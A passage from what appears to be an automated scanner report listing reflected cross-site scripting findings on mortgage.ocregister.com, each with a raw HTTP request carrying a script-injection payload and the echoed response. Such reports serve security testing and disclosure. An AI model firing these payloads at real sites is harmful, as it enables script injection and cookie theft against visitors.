The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6be24"><script>alert(1)</script>6d101414c29 was submitted in the REST URL parameter 1. This input was echoed as 6be24\"><script>alert(1)</script>6d101414c29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20116be24"><script>alert(1)</script>6d101414c29/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20116be24\"><script>alert(1)</script>6d101414c29/02/feed/" />
...[SNIP]...

1.376. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2022c"><script>alert(1)</script>df2f3673541 was submitted in the REST URL parameter 2. This input was echoed as 2022c\"><script>alert(1)</script>df2f3673541 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/022022c"><script>alert(1)</script>df2f3673541/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/022022c\"><script>alert(1)</script>df2f3673541/feed/" />
...[SNIP]...

1.377. http://mortgage.ocregister.com/2011/02/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be6d4"><script>alert(1)</script>10654d20381 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be6d4\"><script>alert(1)</script>10654d20381 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/?be6d4"><script>alert(1)</script>10654d20381=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2011 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/?be6d4\"><script>alert(1)</script>10654d20381=1feed/" />
...[SNIP]...

1.378. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848f3"><script>alert(1)</script>73c38926bd3 was submitted in the REST URL parameter 5. This input was echoed as 848f3\"><script>alert(1)</script>73c38926bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668848f3"><script>alert(1)</script>73c38926bd3/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668848f3\"><script>alert(1)</script>73c38926bd3/feed/" />
...[SNIP]...

1.379. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 231b3"><script>alert(1)</script>bb110f17cc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 231b3\"><script>alert(1)</script>bb110f17cc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/?231b3"><script>alert(1)</script>bb110f17cc5=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41668>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83614


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
title=" Predatory lending suit settles for $6.5 million - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/?231b3\"><script>alert(1)</script>bb110f17cc5=1feed/" />
...[SNIP]...

1.380. http://mortgage.ocregister.com/44146092a8373b49c062f68d9825aa14.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /44146092a8373b49c062f68d9825aa14.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00fb"><script>alert(1)</script>98a4af95827 was submitted in the REST URL parameter 1. This input was echoed as b00fb\"><script>alert(1)</script>98a4af95827 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b00fb"><script>alert(1)</script>98a4af95827?t=1759807488 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:02:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:02:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/b00fb\"><script>alert(1)</script>98a4af95827?t=1759807488feed/" />
...[SNIP]...

1.381. http://mortgage.ocregister.com/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c3"><script>alert(1)</script>30983565075 was submitted in the REST URL parameter 1. This input was echoed as 9a6c3\"><script>alert(1)</script>30983565075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9a6c3"><script>alert(1)</script>30983565075/print.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:02:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:02:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/css9a6c3\"><script>alert(1)</script>30983565075/print.cssfeed/" />
...[SNIP]...

1.382. http://mortgage.ocregister.com/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6883"><script>alert(1)</script>aee79722e35 was submitted in the REST URL parameter 2. This input was echoed as c6883\"><script>alert(1)</script>aee79722e35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/print.cssc6883"><script>alert(1)</script>aee79722e35 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:02:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:02:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/css/print.cssc6883\"><script>alert(1)</script>aee79722e35feed/" />
...[SNIP]...

1.383. http://mortgage.ocregister.com/feed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feed/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71cd"><script>alert(1)</script>1f35e8c0ea2 was submitted in the REST URL parameter 1. This input was echoed as a71cd\"><script>alert(1)</script>1f35e8c0ea2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd"><script>alert(1)</script>1f35e8c0ea2/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:23:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 16:23:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd\"><script>alert(1)</script>1f35e8c0ea2/feed/" />
...[SNIP]...

1.384. http://mortgage.ocregister.com/feeda71cd">1f35e8c0ea2/feed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" />
...[SNIP]...

1.388. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" />
...[SNIP]...

1.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" />
...[SNIP]...

1.390. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" />
...[SNIP]...

1.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
